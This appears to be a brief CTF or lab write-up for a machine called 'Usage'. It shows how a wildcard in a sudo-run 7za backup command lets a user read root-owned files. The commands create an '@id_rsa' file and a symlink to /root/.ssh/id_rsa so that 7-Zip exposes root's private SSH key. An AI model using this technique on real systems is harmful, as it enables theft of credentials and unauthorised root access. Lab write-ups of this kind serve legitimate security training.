Wildcard on compression binaries

7-Zip

In this example I found that my user can execute the next as root (sudo). the vulnerable part is *

/usr/bin/7za a /var/backups/project.zip -tzip -snl -mmt -- *

To exploit it you only have to create a symbolic file that point to the target file and execute the binary. Finally unzip the file and access to the desired file.

touch @id_rsa
ln -s /root/.ssh/id_rsa id_rsa

Machine: Usage